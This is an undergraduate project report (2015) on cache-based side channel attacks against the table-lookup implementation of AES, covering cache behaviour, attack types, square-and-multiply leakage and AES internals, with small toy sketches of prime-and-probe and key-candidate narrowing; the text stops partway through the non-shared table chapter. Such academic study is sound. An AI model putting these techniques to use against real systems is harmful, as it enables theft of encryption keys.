Cache Based Side Channel Attacks On AES
A Major Project Report
Submitted in partial fulfillment for the Award of
BACHELOR OF TECHNOLOGY
IN
COMPUTER SCIENCE AND ENGINEERING
By
Ravi Prakash Giri
2011ECS32
To
SHRI MATA VAISHNO DEVI UNIVERSITY,
J&K, INDIA
MAY, 2015
Certificate
This is to certify that I, Ravi Prakash Giri (2011ECS32), have worked under the
guidance of Mrs. Sonika Gupta on the project titled "Cache Based Side Channel
Attacks On AES" in the School of Computer Science & Engineering, College of
Engineering, Shri Mata Vaishno Devi University, Kakryal, Jammu & Kashmir, from
2nd Jan 2015 to 17th May 2015, for the award of Bachelor of Technology in
Computer Science & Engineering.
The contents of this project, in full or in parts, have not been submitted to any
other Institute or University for the award of any degree or diploma.
Student’s Signature
Student’s Name
This is to certify that the above student has worked on the project titled
"Cache Based Side Channel Attacks on AES" under my supervision.
Signature:
Guide Name: Mrs. Sonika Gupta
Acknowledgement
I would like to express my sincere gratitude to Prof. Bernard L. Menezes, IIT-
Bombay for his constant motivation, useful suggestions and words of wisdom. He has
been my primary source of guidance during my entire project. I would like to extend
my gratitude towards my internal guide Mrs. Sonika Gupta for her guidance and
for providing necessary information regarding the project. I am extremely grateful
for the opportunity to work on this project in a team comprising Bholanath Roy,
Vibhor Agrawal and Ashokkumar C under the supervision of Prof. Bernard Menezes
at IIT-Bombay. A summary of this work was recently submitted to an international
conference in a paper titled "Design and Implementation of an Espionage Network
for Cache based Side Channel Attacks on AES".
Abstract
Side channel attacks exploit information gained from the physical implementation
or design of a cryptographic system rather than mathematical weaknesses. We have
extended and modified existing work in the field of cache-based side channel
attacks targeting the software implementation of the Advanced Encryption Standard
(AES) by designing and implementing an espionage network. Our model includes a
spy controller, a ring of spy threads and an analytical operator, all hosted on a
single server. The collaborative execution of the spy controller and spy ring
restricts the victim process to accessing very few cache memory lines, where the
lookup tables reside. Our results indicate that our setup can deduce the
encryption key in fewer than 30 encryptions and with far fewer victim
interruptions than previous work. Moreover, this approach can be adapted to work
on various OS platforms and on different versions of OpenSSL.
List of Figures
3.1 Access based cache attack [3]
5.1 SubBytes() Transformation [2]
5.2 ShiftRows() Transformation [2]
5.3 MixColumns() Transformation [2]
5.4 AddRoundKey() Transformation
6.1 Evict-Time & Prime-probe
6.2 Graph showing cache sets with high access time
6.3 Equations for second round attack
7.1 Functioning of the Completely Fair Scheduler [11]
7.2 Denial of Service attack on CFS [11]
8.1 Flush+Reload attack timings [18]
8.2 Code for the Flush+Reload technique [18]
8.3 The espionage network
8.4 Timeline of victim and spy threads
8.5 Frequency vs. cache access time (ticks)
10.1 #Accesses per run (#spy threads = 10)
10.2 #Accesses per run (#spy threads = 40)
10.3 Cache accesses detected by spy threads
10.4 Differences in the peak for 1100 accesses
10.5 Differences in the peak for 1300 encryptions
10.6 Encryptions required (Perfectly Synch.)
10.7 Encryptions required (synch. from last table accesses)
10.8 Encryptions required for second round attack (prefetching disabled)
10.9 Encryptions required for second round attack (prefetching enabled)
11.1 Intel MSR Prefetcher
List of Tables
4.1 Steps in calculating a^50
10.1 Conflicting access resolution
Contents
Acknowledgement
Abstract
List of Figures
List of Tables
1 Introduction
  1.1 Purpose
  1.2 Problem Statement
    1.2.1 Motivation
    1.2.2 Goals
  1.3 Report Overview
2 Related Work
3 Preliminaries
  3.1 Basics of Cache working
  3.2 Cache based Side Channel Attacks
  3.3 Types of Cache based side channel attacks
    3.3.1 Time driven
    3.3.2 Trace driven
    3.3.3 Access driven
4 Cache Attacks in Cryptographic Algorithms
  4.1 Introduction
    4.1.1 Cache attacks in secret key cryptography
    4.1.2 Cache attacks in public key cryptography
5 Advanced Encryption Standard
  5.1 Description of the Cipher
  5.2 AES Algorithm
    5.2.1 Key Expansions
    5.2.2 Initial Round
    5.2.3 Rounds
    5.2.4 Final Round
  5.3 AES Implementation
    5.3.1 Round Transformations
    5.3.2 Last Round Implementation
6 Cache attacks on Non-shared table
  6.1 Overview
  6.2 Cache access measurement
  6.3 First Round Attack
  6.4 Second Round Attack
7 Cache attacks by exploiting CFS
  7.1 Overview
  7.2 Completely Fair Scheduler
  7.3 Attacking CFS
  7.4 Retrieving Key
8 Design & Implementation of Espionage Infrastructure
  8.1 Flush+Reload Technique
  8.2 Our espionage infrastructure
  8.3 Approach for Attack
    8.3.1 Algorithm
9 Coding
  9.1 Experimental Setup
  9.2 Attacker source code
10 Results and Analysis
11 Countermeasures
  11.1 Pre-fetching
    11.1.1 Issues
    11.1.2 Workaround
  11.2 Look-up tables Misalignment
  11.3 Synchronization
Chapter 1
Introduction
With the increasing popularity of the Internet as both a communication and a data
storage medium, demand for securing confidential data against unauthorized access
has grown considerably over the last decade. Cryptographic schemes that prevent
confidential data from being accessed by unauthorized users have become
increasingly important, and new schemes appear regularly. Before being deployed
in practice, such schemes typically have to pass a rigorous review process to
eliminate design weaknesses. However, theoretical soundness alone does not ensure
the concrete security of a scheme's physical implementation.
Side-channel cryptanalysis is any attack on a cryptosystem that uses information
emitted as a byproduct of its physical implementation. Side channel attacks are
an important class of implementation-level attacks on cryptographic systems; they
exploit leakage of information through data-dependent characteristics of the
physical implementation, such as electromagnetic radiation, the power consumption
of the device, or the running time of certain operations, and are typically
specific to the actual implementation of the algorithm. Side channel attacks
exploit the fact that, in reality, a cipher is not a pure mathematical function
E_k[P] → C, but a function E_k[P] → (C, t), where t is any additional information
produced by the physical implementation[13]. An important class of timing attacks
are those based on obtaining measurements from cache memory systems.
General classes of side channel attack include:
• Timing attacks are based on measuring how much time various computations
take to perform.
• Power-monitoring attacks make use of the varying power consumption of the
hardware during computation.
• Electromagnetic attacks are based on leaked electromagnetic radiation, which
can directly provide plaintexts and other information. Such measurements can be
used to infer cryptographic keys using techniques equivalent to those in power
analysis, or in non-cryptographic attacks, e.g. TEMPEST (a.k.a. van Eck phreaking
or radiation monitoring) attacks.
• Acoustic cryptanalysis attacks exploit sound produced during a computation
(rather like power analysis), while differential fault analysis recovers secrets
by introducing faults into a computation.
• Row hammer attacks are another kind of side channel attack, in which
off-limits memory can be changed by accessing adjacent memory.
The Advanced Encryption Standard (AES)[6], a relatively new algorithm for secret
key cryptography, is now universally supported on servers, browsers, etc.
Software implementations of AES, including OpenSSL's, make extensive use of table
lookups in lieu of time-consuming mathematical field operations[6]. Cache-based
side channel attacks take advantage of the fact that access times to different
levels of the memory hierarchy differ, and can thereby retrieve the key of a
victim performing AES.
1.1 Purpose
The purpose of our experiment is to design and implement an efficient cache-based
side channel attack on the Advanced Encryption Standard, the de facto standard of
secret key cryptography. Over the last ten years, various attacks on AES have
been reported, each with its own complications. The main purpose of our
experiment is therefore to develop a much easier attack that requires far fewer
victim interruptions and encryptions than previous work, and that can be mounted
on today's processors such as the Intel Core i5 and Core i7.
1.2 Problem Statement
1.2.1 Motivation
Among the many side channels available, we are particularly interested in the
cache because caches form a shared resource for which all processes compete, and
which is thus affected by every process. While the data stored in the cache is
protected by virtual memory mechanisms, the metadata about the contents of the
cache, and in particular the memory access patterns of the processes using it,
are not fully protected.
The cache thus provides an easily accessible medium on which an attacker can spy
in a concealed manner.
1.2.2 Goals
• To design and implement an espionage network, with associated analytic
capabilities, that retrieves the AES key using fewer encryptions and fewer
interruptions of the victim process.
• To demonstrate a complete attack on the OpenSSL implementation of AES, and
further to reduce the time quantum provided to the victim process to an extent
useful for our attack.
• To understand how both shared and non-shared AES tables can be exploited
through the cache.
1.3 Report Overview
This document is a brief report on how the cache can be exploited as a side
channel. To start with, the report briefly describes how the cache works and how
it can be used as a medium for spying and gathering information that is otherwise
meant to be secret.
Chapter 2 of this report describes related work in this field. Chapter 3 covers
the preliminaries of side channel attacks and cache operation. Chapter 4 gives a
broad idea of how the cache can be used as a medium of attack in both public key
and secret key cryptography. The report centres on attacks against AES, so
chapter 5 explains the AES algorithm and how it is implemented; our attack
focuses on this algorithm alone. In chapters 6 and 7 we go through techniques for
exploiting AES in both the non-shared and shared table scenarios. The next
chapter deals with the design and implementation of our espionage infrastructure
for the attack. In the remaining chapters, we analyse the results of our attack
and discuss countermeasures.
Chapter 2
Related Work
Cache memory was first considered as a covert channel for extracting sensitive
information by Hu[12]. In April 2005, D. J. Bernstein announced a cache-timing
attack against a software implementation of AES, which he used to break a custom
server using OpenSSL's AES encryption[5]. The attack required over 200 million
chosen plaintexts on a Pentium III machine. The custom server was designed to
give out as much timing information as possible (it reports back the number of
machine cycles taken by the encryption operation). Although the attack is generic
and portable, it needs 2^27.5 encryptions and sample timing measurements with a
known key on an identically configured target server.
In 2003, Tsunoo et al.[17] demonstrated a time-driven cache attack on DES. They
focused on the overall hit ratio during encryption and performed the attack by
exploiting the correlation between cache hits and encryption time. A similar
approach was used by Bonneau et al., who emphasized individual cache collisions
during encryption instead of the overall hit ratio[13]. Although Bonneau's attack
was a considerable improvement over previous work, it still requires 2^13 timing
samples.
In October 2005, Dag Arne Osvik, Adi Shamir and Eran Tromer presented a paper[16]
demonstrating several cache-timing attacks against AES. One attack was able to
obtain an entire AES key after only 800 encryption-triggering operations, in a
total of 65 milliseconds. This attack requires the attacker to be able to run
programs on the same system or platform that is performing AES.
A major contribution to access-driven cache attacks appeared in the 2010 paper of
Tromer et al.[7]. They performed both synchronous and asynchronous attacks. In
the synchronous attack, 300 encryptions were required to recover a 128-bit AES
key on an Athlon64 system, and in the asynchronous attack, 45.7 bits of
information about the key were effectively retrieved. They introduced the
Prime+Probe technique
to perform an access-driven attack. In the prime phase, the attacker fills the
cache with its own data before encryption begins. During encryption, the victim
evicts some of the attacker's data from the cache in order to load lookup table
entries. In the probe phase, the attacker measures the reload time of its data
and finds the cache misses corresponding to the lines where the victim loaded
lookup table entries. Both the attacker and the victim must execute on the same
processor core for the attack to succeed.
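The prime and probe phases described here can be illustrated with a toy cache model (our own simplified sketch, not the code of Tromer et al.; tags, associativity and timing are abstracted away, and a "miss" is a boolean rather than a slow reload):

```python
class ToyCache:
    """Toy cache model: each set remembers only which process last
    loaded data into it. This is just enough structure to show the
    Prime+Probe cycle."""

    def __init__(self, n_sets):
        self.owner = [None] * n_sets

    def access(self, who, set_idx):
        """Access a set; returns True on a hit. The load evicts
        whatever the previous owner had cached in that set."""
        hit = self.owner[set_idx] == who
        self.owner[set_idx] = who
        return hit


def prime(cache, n_sets):
    """Prime phase: the attacker fills every cache set with its own data."""
    for s in range(n_sets):
        cache.access("attacker", s)


def probe(cache, n_sets):
    """Probe phase: the sets that now miss for the attacker are exactly
    the ones the victim's lookups landed in during encryption."""
    return {s for s in range(n_sets) if not cache.access("attacker", s)}
```

For instance, after priming a 16-set cache, if the victim's table lookups touch sets 3 and 7, `probe` reports exactly {3, 7}; in the real attack the miss signal is a slow reload time rather than a boolean.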
The ability to detect whether a cache line has been evicted was further exploited
by Neve et al. in 2007[14]. Advancing the line of asynchronous attacks, they
performed an improved access-driven cache attack on the last round of AES,
recovering the 128-bit key with 20 encryptions. However, this attack was feasible
only on single-threaded processors, and the practicality of their implementation
was unclear due to insufficient system and OS kernel version details.
Gullasch et al. proposed an efficient access-driven cache attack[11] for the case
where the attacker and victim use a shared crypto library. The spy process first
flushes the memory lines corresponding to the entire lookup table from all levels
of the cache, then interrupts the victim process after allowing it a single
lookup table access. After every interrupt, it determines from the reload time
which memory line was accessed by the victim. This information is further
processed using a neural network to remove noise and retrieve the AES key.
Wei et al. used Bernstein's timing attack on AES running inside an ARM Cortex-A8
single-core system in a virtualized environment to extract the AES encryption
key[15]. Apecechea et al. in 2014 performed Bernstein's cache-based timing attack
in a virtualized environment (Xen and VMware VMMs) to recover the AES secret
key[10] from a co-resident VM with 2^29 encryptions. They later improved on this
in the paper of Irazoqui et al.[8], using the Flush+Reload technique to recover
the AES secret key with 2^19 encryptions.
We improve on the work of the last decade by providing a practical access-driven
attack on the AES algorithm. Our attack works under much weaker assumptions and
with far fewer victim interruptions than any of the attacks discussed so far.
Moreover, it is very efficient, requiring only about 25 encryptions to retrieve
the complete AES key.
Chapter 3
Preliminaries
3.1 Basics of Cache working
The cache sits between main memory (RAM) and the CPU; instructions and data are
staged in the cache on their way from memory to the CPU and are accessed from
there. A cache stores data so that future requests for that data can be served
faster; the data stored in a cache might be the result of an earlier computation,
or a duplicate of data stored elsewhere. A cache hit occurs when the requested
data can be found in the cache, while a cache miss occurs when it cannot. On a
cache miss, the CPU retrieves the data from main memory and stores it into the
cache. This behaviour is motivated by the temporal locality principle: recently
accessed data is likely to be accessed again. Cache hits are served by reading
data from the cache, which is faster than recomputing a result or reading from a
slower data store; thus, the more requests that can be served from the cache, the
faster the system performs.
The CPU takes advantage of spatial locality as well: when some data is
accessed, values stored close to it are likely to be accessed soon. Hence, on a
cache miss, the CPU loads not just the requested data but the whole cache line
containing it and its neighbours. The cache line is the unit of data that can be
written to or retrieved from the cache at a time.
To understand this in more detail, let us assume an n-way set-associative cache,
where each address can map to n different cache blocks. The cache contains 2^a
sets, each holding n cache lines, and each line in turn contains 2^b bytes of
data. To locate the cache line holding data from memory address A, the least
significant b bits are ignored, since the line size is 2^b bytes. The next a bits
denote the cache set, and the remaining bits form the tag used to verify that the
correct entry has been found. Data can go into any line within its designated set.
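This address decomposition can be sketched as follows (the concrete parameter values in the example below are illustrative, typical of an L1 data cache, not tied to any particular processor):

```python
def cache_fields(addr, b, a):
    """Split a memory address into (tag, set index, line offset) for a
    cache with 2**a sets and 2**b-byte lines. Associativity does not
    affect indexing; it only determines how many lines share a set."""
    offset = addr & ((1 << b) - 1)             # low b bits: byte within the line
    set_index = (addr >> b) & ((1 << a) - 1)   # next a bits: cache set
    tag = addr >> (b + a)                      # remaining bits: tag
    return tag, set_index, offset
```

With 64-byte lines (b = 6) and 64 sets (a = 6), `cache_fields(0x1ABCD, 6, 6)` gives tag 0x1A, set 0x2F and offset 0x0D. Two addresses compete for the same set exactly when their middle a bits agree, which is what makes controlled evictions possible.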
Which line within the set is used for an incoming block is determined by a
predetermined cache replacement policy; in general, a least-recently-used (LRU)
policy is employed.
3.2 Cache based Side Channel Attacks
Side channel attacks were previously used to break specialized systems such as
smart cards. Nowadays the major focus is on side channel attacks that exploit
shared resources in conventional microprocessors. Such attacks are very powerful
because they do not require the attacker's physical presence to observe the side
channel and can therefore be launched remotely using only non-privileged
operations.
Cache-based side channel attacks are an example of this class. Here, an attacker
process monitors the cache activity generated by the victim cipher process; if
carefully designed, such attacks can leak enough information about the secret
key. They rest on the fact that when the CPU accesses data that is not in the
cache, it experiences a cache miss delay, and this delay is significant enough to
be distinguished, by measurement, from the case where the data is present in the
cache. The attacker can thus detect the occurrence and frequency of cache misses.
The run-time of fast software ciphers like AES depends heavily on the speed at
which table lookups are performed. A popular implementation style for AES is the
T-table implementation[6]: it combines the four major round operations into a
single table lookup per state byte, together with XOR operations. The index of
the loaded entry is determined by a byte of the cipher state. Therefore,
information about which table values have been loaded into the cache can reveal
information about the secret state of AES.
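In the first round the leakage is especially direct: the lookup index for each state byte is the XOR of a plaintext byte with a key byte, so observing which cache line of the table was loaded reveals the high-order bits of that XOR. A small illustrative sketch (the 64-byte line and 4-byte entry sizes are typical assumed values, not measurements):

```python
LINE_BYTES = 64                        # assumed cache line size
ENTRY_BYTES = 4                        # each T-table entry is a 4-byte word
PER_LINE = LINE_BYTES // ENTRY_BYTES   # 16 table entries per cache line

def first_round_index(p, k):
    """Index of the first-round T-table lookup for one state byte."""
    return p ^ k

def table_line(index):
    """Cache line (within the table) that the lookup touches; only these
    high-order bits of the index leak through the cache."""
    return index // PER_LINE

def key_candidates(p, line):
    """Key bytes consistent with observing `line` for plaintext byte p."""
    return {k for k in range(256)
            if table_line(first_round_index(p, k)) == line}
```

With 16 entries per line, a single observation leaves 16 candidate key bytes (the upper four bits of p XOR k are recovered); repeating with different plaintexts never shrinks the set further, which is why a first-round attack alone recovers only the high nibble of each key byte and a second-round attack is needed for the rest.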
In any side channel attack, there are essentially two phases:
1. Online phase, where side channel information is gathered using repeated
encryption/decryption. Here the attacker measures and tabulates the side
channel information (timing, power consumption, etc.) as dictated by the
attack method.
2. Offline phase, where the data from the online phase is used to generate
results and graphs that help in predicting and verifying observations about
the secret value of the cipher. In many cases, analysis from this phase
actively guides the encryptions and decryptions carried out in the online
phase.
3.3 Types of Cache based side channel attacks
3.3.1 Time driven
In time-driven attacks[5], attacker can observe the aggregated profile of an encryp-
tion or decryption, i.e. total execution time taken by the cipher process to complete
that encryption or decryption. Attacker thus correlates the time taken by cipher
process to the number of cache misses occurring during that encryption. More the
number of cache misses more the execution time. This attack relies on the accurate
measurement of timing of the encryption and execute the timing code synchronously
before and after an encryption round.
As this attack is based on overall execution time, and other factors (e.g.
processes running simultaneously with the victim) can affect the victim process,
a large number of samples is needed in the offline phase to accurately extract
information about the secret key. That being said, this type of attack is very
easy to carry out and requires minimal coding in the online phase. To find the
relationship between timing information and key values, the attacker can make
statistical, algorithm-specific inferences about the state during processing.
For example, it might be inferred that in encryptions with a large number of
misses, certain key-related variables are unequal, since they access different
parts of memory and cause cache misses, while with fewer misses they are equal.
From such observations, the attacker can relate the plaintext to the cipher key
and hence unravel the key bits.
3.3.2 Trace driven
In trace-driven attacks[3], the attacker is able to capture a profile of cache
activity during encryption, down to the granularity of individual memory
accesses: the attacker can figure out the outcome, in terms of hits and misses,
of every memory access (the trace) that the cipher process issues.
A trace is a sequence of cache hits and misses; for example, HMMM, MMMH, HHMM
and HMHM are valid traces, where H represents a cache hit and M a cache miss.
The attacker can observe whether a particular memory access to a lookup table
yields a hit or a miss, and thus infer information about the lookup indices. As
these indices are key-dependent in almost all cases, secret information can be
revealed.
This type of information can be obtained using simple power analysis of the
target process. Since the power consumption of a microprocessor depends on the
instruction being executed and on the data being manipulated, the attacker can
observe the difference in power consumption when the cache miss routine is
carried out by the victim.
3.3.3 Access driven
These are the most recent of the three attack types and the most powerful. Here,
the attacker and victim processes share the cache memory, and secret information
is leaked using the cache as the side channel medium. The attacker can determine
information up to the granularity of the cache sets modified by the victim
process, and can thus determine which elements of the lookup tables the cipher
accessed.
Figure 3.1: Access based cache attack[3]
The whole process can be summarized as follows. The two processes execute on the
same machine, thus sharing the data cache. During encryption, the victim process
requests data residing in memory, causing either a cache hit or a miss. The
attacker spies on this cache activity of the victim process and, using the
techniques discussed in section X, determines the cache set being accessed.
Of the three techniques, this is the most powerful and gives the most information
to the attacker. However, gathering such information from the system under
scrutiny is quite complex.
Chapter 4
Cache Attacks in Cryptographic
Algorithms
4.1 Introduction
Cache-based side channel attacks are applicable to both secret key and public key
encryption schemes. The next two subsections briefly describe how they apply in
each scenario.
4.1.1 Cache attacks in secret key cryptography
The basic principle of cache-based side channel attacks is the difference in data
access time between a cache hit and a cache miss.
Secret key ciphers such as AES and DES are built from simple mathematical
operations that are repeated over many rounds to strengthen the encryption. In
AES, for instance, each encryption consists of 10 nearly identical rounds, each a
combination of four simple mathematical/logical operations.
Because of their simple nature, these operations can easily be realized as
lookup tables/arrays in which precomputed results are stored and simply accessed
as needed. This greatly reduces the time required, as the four operations of a
round reduce to a few table accesses.
However, this creates an opening for a side channel attack. The lookup tables
are loaded into the cache, and the encryption algorithm uses a combination of key
bits to select the particular table element to access. If the attacker somehow
figures out information about the locations accessed by the encryption
algorithm, he or she can directly relate them to the key bits.
4.1.2 Cache attacks in public key cryptography
Public key cryptography, on the other hand, is based on heavy mathematical
operations involving numbers hundreds of bits long. For example, RSA encryption
of a message requires calculating m^p mod n, where p is a large number of the
order of thousands of bits.
Due to the huge complexity involved, these operations, unlike their secret key
counterparts, cannot be precomputed and stored in tables, and they consequently
take far more time. As there are no tables involved, we cannot apply the same
principle as in AES to attack such schemes.
However, while performing such operations (modular exponentiation, etc.),
different code paths are taken based on the secret bits. As an example, suppose
we want to compute a^50 for some a.
Writing 50 in binary: 110010.
Starting with result = 1 and moving bit by bit from the left (most significant
bit) of the exponent:
For every 1 bit, we square the result and then multiply it by a.
For every 0 bit, we simply square the result.
The steps to get the result[4]:
Bit of 110010 considered (MSB first)    Result (initial value = 1)
1                                       (1)^2 * a = a
1                                       (a)^2 * a = a^3
0                                       (a^3)^2 = a^6
0                                       (a^6)^2 = a^12
1                                       (a^12)^2 * a = a^25
0                                       (a^25)^2 = a^50
Table 4.1: Steps in calculating a^50
We can clearly see that different operations are performed depending on the bit
values. This is the basis of side channel attacks in the public key scenario. The
square and multiply routines are loaded into memory and thus map to some cache
location(s). Assume the square function maps to line x and the multiply function
to line y. The attacker, instead of spying on the data cache, watches the
instruction cache and tries to figure out at each step whether a multiplication
or a squaring is performed, by continuously monitoring both lines x and y. Once
the attacker obtains the ordering of the squaring and multiplication operations,
he or she can easily recover the secret exponent.
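The procedure above, instrumented to record its operation sequence, shows exactly how much such a spy learns (a hypothetical sketch, not an attack implementation):

```python
def square_and_multiply(a, e, n, trace=None):
    """Compute a**e mod n, scanning the exponent MSB-first: square for
    every bit, multiply only when the bit is 1. If `trace` is a list,
    record 'S'/'M' — the operation sequence a spy watching the
    instruction-cache lines of the two routines would observe."""
    result = 1
    for bit in bin(e)[2:]:
        result = (result * result) % n      # square on every bit
        if trace is not None:
            trace.append('S')
        if bit == '1':
            result = (result * a) % n       # multiply only on 1 bits
            if trace is not None:
                trace.append('M')
    return result

def exponent_from_trace(trace):
    """Recover the exponent from the observed sequence: an 'S' followed
    by 'M' is a 1 bit, a lone 'S' is a 0 bit."""
    bits, i = "", 0
    while i < len(trace):
        if i + 1 < len(trace) and trace[i + 1] == 'M':
            bits += '1'
            i += 2
        else:
            bits += '0'
            i += 1
    return int(bits, 2)
```

For e = 50 (binary 110010) the trace reads SM SM S S SM S, exactly the operation column of Table 4.1, and `exponent_from_trace` turns that observation back into 50.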
Chapter 5
Advanced Encryption Standard
5.1 Description of the Cipher
AES is based on a design principle known as a substitution-permutation network, a
combination of substitution and permutation, and is fast in both software and
hardware. Unlike its predecessor DES, AES does not use a Feistel network. AES is
a variant of Rijndael with a fixed block size of 128 bits and a key size of 128,
192 or 256 bits.
Let us briefly look at how AES works and how the AES tables are computed and
used. AES operates on a 4 × 4 column-major matrix of bytes, processing 16 bytes
at a time. The key size determines the number of transformation rounds that
convert the input into an intermediate output, which at the end of the last round
becomes the ciphertext.
The number of rounds is:
1. 10 Rounds for Key size of 128 bits
2. 12 Rounds for Key size of 192 bits
3. 14 Rounds for Key size of 256 bits
Each round consists of several processing stages, similar but distinct, including
one that depends on the encryption key itself. A set of reverse rounds is applied
to transform the ciphertext back into the original plaintext using the same
encryption key.
5.2 AES Algorithm
The Algorithm consists of four main parts:
1. Key Expansions: Generating round keys for each round using Rijndael’s key
schedule algorithm. AES requires a separate 128-bit round key block for each
round plus one more.
2. Initial Round: Each byte of the state is combined with a block of the round
key using bitwise XOR.
3. Rounds:
• SubBytes
• ShiftRows
• MixColumns
• AddRoundKey
4. Final Round:
• SubBytes
• ShiftRows
• AddRoundKey
5.2.1 Key Expansions
AES uses the Rijndael key schedule[6] to compute a separate round key for each round
from the initial key. It uses the Rijndael S-box in the process. Algorithm 1 below is
self-explanatory.
Let w[0] ... w[3] be initialized with the original AES key, where each w[i] is a 4-byte word.
5.2.2 Initial Round
Before starting the first round, each byte of the plaintext is combined with the
corresponding byte of the initial 128 bits of the key using a bitwise XOR operation.
5.2.3 Rounds
Each round except the last performs the four steps mentioned below:
Algorithm 1 Rijndael key schedule
1: procedure KeySchedule
2:   for i = 4 to 43 do
3:     x ← w[i−1]
4:     if (i is a multiple of 4) then
5:       x ← f(x)
6:     end if
7:     w[i] ← w[i−4] ⊕ x
8:   end for
9: end procedure
1. SubBytes() Transformation : In this step, each byte in the state matrix
is replaced with another according to a lookup table called the Rijndael S-
Box (substitution box). This step provides nonlinearity in the cipher. The
S-box used is derived from the multiplicative inverse over GF(2^8), known to
have good non-linearity properties. It is a fixed, publicly known table; the
secrecy lies in the key and not in the algorithm.
Figure 5.1: SubBytes() Transformation[2]
2. ShiftRows() Transformation : In ShiftRows, the rows of the State are cycli-
cally shifted over different offsets. Row 0 is not shifted, row 1 is shifted over
C1 bytes, row 2 over C2 bytes and row 3 over C3 bytes. The shift offsets C1,
C2 and C3 depend on the block length; for the 128-bit block of AES, C1 = 1,
C2 = 2 and C3 = 3. The operation of shifting the rows of the State over the
specified offsets is denoted by:
ShiftRow(State).
3. MixColumns() Transformation : Each column of the State is multiplied by a
constant 4x4 matrix over the field GF(2^8). In this step, a mixing operation is
applied to the four bytes of each column. The MixColumns function takes
four bytes as input and outputs four bytes, where each input byte affects all
four output bytes. This provides diffusion to the cipher, which ensures that
modifications of individual bits of the plaintext get spread across the ciphertext.
Figure 5.2: ShiftRows() Transformation[2]
Figure 5.3: MixColumns() Transformation[2]
4. AddRoundKey() Transformation : In this operation, a Round Key is applied
to the State by a simple bitwise EXOR. The Round Key is derived from the
Cipher Key by means of the key schedule. The Round Key length is equal to
the block length. The transformation that consists of EXORing a Round Key
to the State is denoted by:
AddRoundKey(State,RoundKey)
The transformation is illustrated in Figure 5.4.
5.2.4 Final Round
The MixColumns operation is omitted in the last round, and an additional
AddRoundKey operation is performed before the first round (using a whitening key).
Figure 5.4: AddRoundKey() Transformation
5.3 AES Implementation
5.3.1 Round Transformations
The different steps of the round transformation can be combined into a single set of
table lookups, allowing very fast implementations on processors with a word length
of 32 bits or above. In this section, we explain how this can be done. One column of
the round output e is expressed in terms of bytes of the round input a. Here, ai,j
denotes the byte of a in row i and column j, and aj denotes column j of the State a.
For the key addition and the MixColumn transformation, we have :
ej = M • cj ⊕ kj
where M is the constant MixColumns matrix. For the ShiftRow and the ByteSub
transformations, we have :
ci,j = S[ai,j+Ci]
In all expressions the column indices must be taken modulo the number of columns,
which is 4 in this case. By substitution, the above expressions can be combined into:
ej = M • ( S[a0,j], S[a1,j+1], S[a2,j+2], S[a3,j+3] )^T ⊕ kj
The matrix multiplication can be expressed as a linear combination of vectors:
ej = S[a0,j] • M0 ⊕ S[a1,j+1] • M1 ⊕ S[a2,j+2] • M2 ⊕ S[a3,j+3] • M3 ⊕ kj
where Mi denotes column i of M. The multiplication factors S[ai,j] of the four
column vectors are obtained by performing a table lookup on the input bytes ai,j
in the S-box table S[256].
We define tables T0 to T3 by Ti[a] = S[a] • Mi.
These are 4 tables with 256 4-byte word entries each, occupying 4 KB in total.
Using these tables, the round transformation can be expressed as:
ej = T0[x0,j]⊕ T1[x1,j+1]⊕ T2[x2,j+2]⊕ T3[x3,j+3]⊕ kj
Hence, a table-lookup implementation with 4 KB of tables takes only 4 table lookups
and 4 EXORs per column per round. Each table is accessed by using an 8 bit index
and gives 32 bits of output.
There is a separate key setup phase where a given 16-byte secret key k = (k0,
. . , k15) is expanded into 10 round keys, K(r) for r = 1, . . . , 10. Each round
key is divided into 4 words of 4 bytes each: K(r) = (K(r)0, K(r)1, K(r)2, K(r)3).
The 0th round key is just the raw key: K(0)j = (k4j, k4j+1, k4j+2, k4j+3) for
j = 0, 1, 2, 3.
Given a 16-byte plaintext p = (p0, . . , p15), encryption proceeds by comput-
ing a 16-byte intermediate state x(r) = (x(r)0, . . . , x(r)15) at each round r. The
initial state x(0) is computed by x(0)i = pi ⊕ ki for i = 0, . . . , 15. Then, the first
9 rounds are computed by updating the intermediate state as follows[16], for r = 0,
. . . , 8:

(x(r+1)0, x(r+1)1, x(r+1)2, x(r+1)3) ← T0[x(r)0] ⊕ T1[x(r)5] ⊕ T2[x(r)10] ⊕ T3[x(r)15] ⊕ K(r+1)0
(x(r+1)4, x(r+1)5, x(r+1)6, x(r+1)7) ← T0[x(r)4] ⊕ T1[x(r)9] ⊕ T2[x(r)14] ⊕ T3[x(r)3] ⊕ K(r+1)1
(x(r+1)8, x(r+1)9, x(r+1)10, x(r+1)11) ← T0[x(r)8] ⊕ T1[x(r)13] ⊕ T2[x(r)2] ⊕ T3[x(r)7] ⊕ K(r+1)2
(x(r+1)12, x(r+1)13, x(r+1)14, x(r+1)15) ← T0[x(r)12] ⊕ T1[x(r)1] ⊕ T2[x(r)6] ⊕ T3[x(r)11] ⊕ K(r+1)3
Finally, to compute the last round, the above equations are repeated with r = 9,
except that T0, . . . , T3 are replaced by T(10)0, . . . , T(10)3. The resulting x(10) is
the ciphertext. Compared to the algebraic formulation of AES, here the lookup
tables represent the combination of the SubBytes, ShiftRows and MixColumns
operations; the change of lookup tables in the last round is due to the absence of
the MixColumns transformation.
5.3.2 Last Round Implementation
The last round can be implemented in multiple ways:
• Using an additional table : Here, a separate table of size 1 KB is used. The
entries in this table are simply the substituted index concatenated 4 times, one
after the other.
• Using the previous tables : In this case, some of the tables used in the
previous rounds are reused.
Chapter 6
Cache attacks on Non-shared table
6.1 Overview
Synchronous attacks are applicable in scenarios where the plaintext or ciphertext is
known and the attacker can operate synchronously with the program performing
AES encryption on the same processor, by using some interface that triggers en-
cryption under an unknown key. The main goal of the attacker is to gather the
table accesses at as fine a granularity as possible.
If we consider a case where the attacker, at each instant, is able to say that a par-
ticular table access was made by the victim process, calculating the secret key becomes
trivial. In such a scenario, the attacker simply XORs the table accesses of the first
round with the plaintext and gets the whole key straight away, because the first-round
table accesses are simply the plaintext bytes XORed with the corresponding key bytes:
xi = pi ⊕ ki
Knowing the table access exactly means knowing the value of xi. So, we simply XOR
it with pi to get ki.
However, the task of getting the table accesses is not so simple and straightforward,
nor can we achieve this granularity of table access.
Each table entry occupies 4 bytes and, assuming the standard cache block size
of 64 bytes, 16 table entries fit into one cache block. The cache block is the
minimum amount of data brought from memory into the cache. So, even if the
victim process has accessed a single entry, all 16 entries corresponding to that
cache block are brought into the cache.
The attacker thus cannot figure out the exact table access; he/she can only find
out which cache block was accessed by the victim process.
To find this information, we need to consider two scenarios.
1. Non-shared table data : Here, the cache is shared, i.e. both processes are
using the same cache, but the AES tables are not shared. So, at the start, the
attacker does not even know where the AES tables are in the cache.
